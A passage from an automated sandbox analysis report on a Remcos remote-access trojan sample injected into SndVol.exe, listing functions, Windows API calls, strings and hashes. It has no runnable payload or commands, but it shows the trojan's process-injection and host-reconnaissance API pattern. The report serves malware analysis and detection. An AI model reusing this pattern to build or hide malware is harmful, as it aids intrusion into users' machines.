Instruction ID: aeb002c389946ceb5aa922958655df1fd40eed4fdeceb39df94a7f8016698fc2
Opcode Fuzzy Hash: ac33a90e4ade1ec82d8a7d1ee1cfe8846d9cfcf1aa6f51aa5ff8ab2cae345854
Instruction Fuzzy Hash: 78D0A7B1AC53014EFB03ABB3B5886B732C89F08308B58F82BF101C9200D7755950CF94

Function 02EBE1F8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02EBE2A7
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02EBE2C3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02EBE33A
VariantClear.OLEAUT32(?), ref: 02EBE363

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: e8e92cce6b3436a72240b0df0b7da8a3ae8ddee26d8df6b4c8e37bc1cbca909b
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 71413C75A402198FCB62DB58CD90BCAB3BDAF49304F4891E5E54DE7211DA34AF808F61

Function 02EBAD4C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 4408af3454724dce53480d89796056a1bd1846d381a155caed3b51a2a5aeb4ca
Instruction ID: 07dc12d63705984c97d881cedb6f22f6f24c4e38648c3fbe0e515f6eddf9ea5e
Opcode Fuzzy Hash: 4408af3454724dce53480d89796056a1bd1846d381a155caed3b51a2a5aeb4ca
Instruction Fuzzy Hash: 3A413B74A802589BDB22DB68CC84BDBB7FDAF08344F4490E5A648E7341DB70AF848F55

Function 02EBAD4A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 193e64900096ab99cb58398fda793c0eb03d5c8dbc3212fe0d46a06d6ff097ac
Instruction ID: 344cccee8edb7c0601483cf2618bae1992f50b8b500dc88beabc23c74f409bed
Opcode Fuzzy Hash: 193e64900096ab99cb58398fda793c0eb03d5c8dbc3212fe0d46a06d6ff097ac
Instruction Fuzzy Hash: C7415B74A802589BDB22DB68CC84BDBB7FDAF08344F4490E5A648E7341DB70AF848F51

Function 02EB1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba3e54e031d4a50cea052dbf74ac3c9da29a0225ecbdeacbf4a469864c12ab3
Instruction ID: 37bd6150432fc9791cbf3f250d820d69e303f9335d5c8f48ac105968e024b875
Opcode Fuzzy Hash: 2ba3e54e031d4a50cea052dbf74ac3c9da29a0225ecbdeacbf4a469864c12ab3
Instruction Fuzzy Hash: EEA1F8667906040BD71AAA7D9CA43EFB392DF85379F28D23EE11DCF381DB64C9418690

Function 02EB94FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02EB95EA), ref: 02EB9582
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02EB95EA), ref: 02EB9588

Strings

yyyy, xrefs: 02EB955D

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 92a5a73b24a77747171a9726f2640e3cf777baa9224a335f02f5107ed2366401
Instruction ID: e2a06ae518ce487564e609ba95b92c17227051f1de76e9c5f8f8eef5cd295a12
Opcode Fuzzy Hash: 92a5a73b24a77747171a9726f2640e3cf777baa9224a335f02f5107ed2366401
Instruction Fuzzy Hash: 2E216271A852189FDB12DFA4C891AEF73B9EF09700F4190A5F905E7291D730AE40CF65

Function 02EC8348 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02EC83D2), ref: 02EC83B4

Strings

Kernel32, xrefs: 02EC8393
FlushInstructionCache, xrefs: 02EC8361

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: f947227734d8e7157b64c850c8b4c29c54d3aa88886898da49957580394c6324
Instruction ID: bd100862cb7fd2975275fdbcf973c9d4b7541cdd0bfa2d07b5783b1f232f5b9f
Opcode Fuzzy Hash: f947227734d8e7157b64c850c8b4c29c54d3aa88886898da49957580394c6324
Instruction Fuzzy Hash: 630162716C0308AFE706EFE5DE51F9BB7EEEB48B00F61A425B904D3640D670AD118A24

Function 02ECAF28 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECAF5C
IsBadWritePtr.KERNEL32(?,00000004), ref: 02ECAF8C
IsBadReadPtr.KERNEL32(?,00000008), ref: 02ECAFAB
IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECAFB7

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
Instruction ID: e5d3196428e14a03de701ce719f425e2d8fe2ca723e7acbe22a862b9dca446c7
Opcode Fuzzy Hash: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
Instruction Fuzzy Hash: 4321A2B268061D9BDB21DFAACD80BAE77AAEF80315F20D525FD1497344D734D8128AA0

Analysis Process: SndVol.exePID: 7944, Parent PID: 7564COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	99%
Signature Coverage:	4.6%
Total number of Nodes:	1121
Total number of Limit Nodes:	45

Executed Functions

Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
Part of subcall function 00411F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
Part of subcall function 00411F34: RegCloseKey.KERNEL32(?), ref: 00411F7D

Sleep.KERNEL32(00000BB8), ref: 0040E243
ExitProcess.KERNEL32 ref: 0040E2B4

Strings

3.8.0 Pro, xrefs: 0040E21E, 0040E28D
!G, xrefs: 0040E19E
override, xrefs: 0040E1B2
pth_unenc, xrefs: 0040E1A3, 0040E1EC, 0040E25B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.8.0 Pro$override$pth_unenc$!G
API String ID: 2281282204-1386060931
Opcode ID: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
Opcode Fuzzy Hash: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,02AE0880), ref: 004315FE
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C

Function 048E1146 Relevance: 3.4, APIs: 2, Instructions: 360memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 048E12B7
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 048E140E

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 670503aa5bbd05ca500e2d418a3d0f65381e2a465829afc3588e233f9a99613e
Instruction ID: 35644f515713817de6d4722897009be6858d8b9351167785276bb91757a4887b
Opcode Fuzzy Hash: 670503aa5bbd05ca500e2d418a3d0f65381e2a465829afc3588e233f9a99613e
Instruction Fuzzy Hash: E8C1B071A00204AFDB24CF6ACC88BAAB7B6FF86314F148659E845EB655D770F901CB50

Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98

Function 00424A66 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00424A70

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
GetProcAddress.KERNEL32(00000000), ref: 0041A912
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
GetProcAddress.KERNEL32(00000000), ref: 0041A927
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
GetProcAddress.KERNEL32(00000000), ref: 0041A940
GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
GetProcAddress.KERNEL32(00000000), ref: 0041A954
GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
GetProcAddress.KERNEL32(00000000), ref: 0041A96C
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
GetProcAddress.KERNEL32(00000000), ref: 0041A980
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
GetProcAddress.KERNEL32(00000000), ref: 0041A98F
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
GetProcAddress.KERNEL32(00000000), ref: 0041AA22
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
GetProcAddress.KERNEL32(00000000), ref: 0041AA33
LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
GetProcAddress.KERNEL32(00000000), ref: 0041AA43

Strings

IsWow64Process, xrefs: 0041A991
user32, xrefs: 0041A964, 0041A9DF, 0041A9E9, 0041A9F4, 0041AA04
IsUserAnAdmin, xrefs: 0041A9B6
SetProcessDpiAwareness, xrefs: 0041A947
GetMonitorInfoW, xrefs: 0041A9FF
Shell32, xrefs: 0041A9BB
kernel32, xrefs: 0041A996, 0041A9A0, 0041A9AB, 0041A9CF
ntdll.dll, xrefs: 0041A978
EnumDisplayDevicesW, xrefs: 0041A9DA
GetSystemTimes, xrefs: 0041AA0F
GlobalMemoryStatusEx, xrefs: 0041A982
GetComputerNameExW, xrefs: 0041A9A6
NtUnmapViewOfSection, xrefs: 0041A973
SetProcessDEPPolicy, xrefs: 0041A9CA
Psapi.dll, xrefs: 0041A8EA, 0041A91F
SetProcessDpiAware, xrefs: 0041A95F
EnumDisplayMonitors, xrefs: 0041A9EF
GetConsoleWindow, xrefs: 0041AA35
Kernel32.dll, xrefs: 0041A90A, 0041A938
GetModuleFileNameExW, xrefs: 0041A919, 0041A91E, 0041A937
GetModuleFileNameExA, xrefs: 0041A8E4, 0041A8E9, 0041A909
Shlwapi.dll, xrefs: 0041AA26
shcore, xrefs: 0041A94C
kernel32.dll, xrefs: 0041A987, 0041AA14, 0041AA1E, 0041AA3A

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
API String ID: 551388010-2474455403
Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

Function 0040D3F0 Relevance: 72.5, APIs: 17, Strings: 24, Instructions: 774
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603

Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 0040D68F, 0040D8A7
Inj, xrefs: 0040D626, 0040D62C, 0040D641
license_code.txt, xrefs: 0040D465
!G, xrefs: 0040D8AC
Exe, xrefs: 0040D534
!G, xrefs: 0040D919
H"G, xrefs: 0040D904
User, xrefs: 0040DD2C
!G, xrefs: 0040D8B6
licence, xrefs: 0040DA22
Remcos Agent initialized, xrefs: 0040DA83
origmsc, xrefs: 0040D6F7
!G, xrefs: 0040D9F6
0"G, xrefs: 0040D656
Administrator, xrefs: 0040DD08
0"G, xrefs: 0040D52A
H"G, xrefs: 0040D9B8
!G, xrefs: 0040D8F2
Access Level: , xrefs: 0040DD3D
`"G, xrefs: 0040DCA3
Software\, xrefs: 0040D4E6
exepath, xrefs: 0040D931, 0040D9DB
(#G, xrefs: 0040D596
0"G, xrefs: 0040D586

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
API String ID: 1529173511-699997109
Opcode ID: c0fe3bac613a94c9405e0ca8567cef12f3d36445c9fd90bd399c2b6a79ce31d1
Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
Opcode Fuzzy Hash: c0fe3bac613a94c9405e0ca8567cef12f3d36445c9fd90bd399c2b6a79ce31d1
Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

Function 00413980 Relevance: 37.5, APIs: 5, Strings: 16, Instructions: 785
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,756F0F10,00471FFC,00000000), ref: 004139D1
WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
Sleep.KERNEL32(00000000,00000002), ref: 004144C7

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

name, xrefs: 00413DBC
C:\Windows\SysWOW64\SndVol.exe, xrefs: 00413E16
`"G, xrefs: 00413F36
H"G, xrefs: 00413D96
!G, xrefs: 00413E30
%I64u, xrefs: 00413D4C
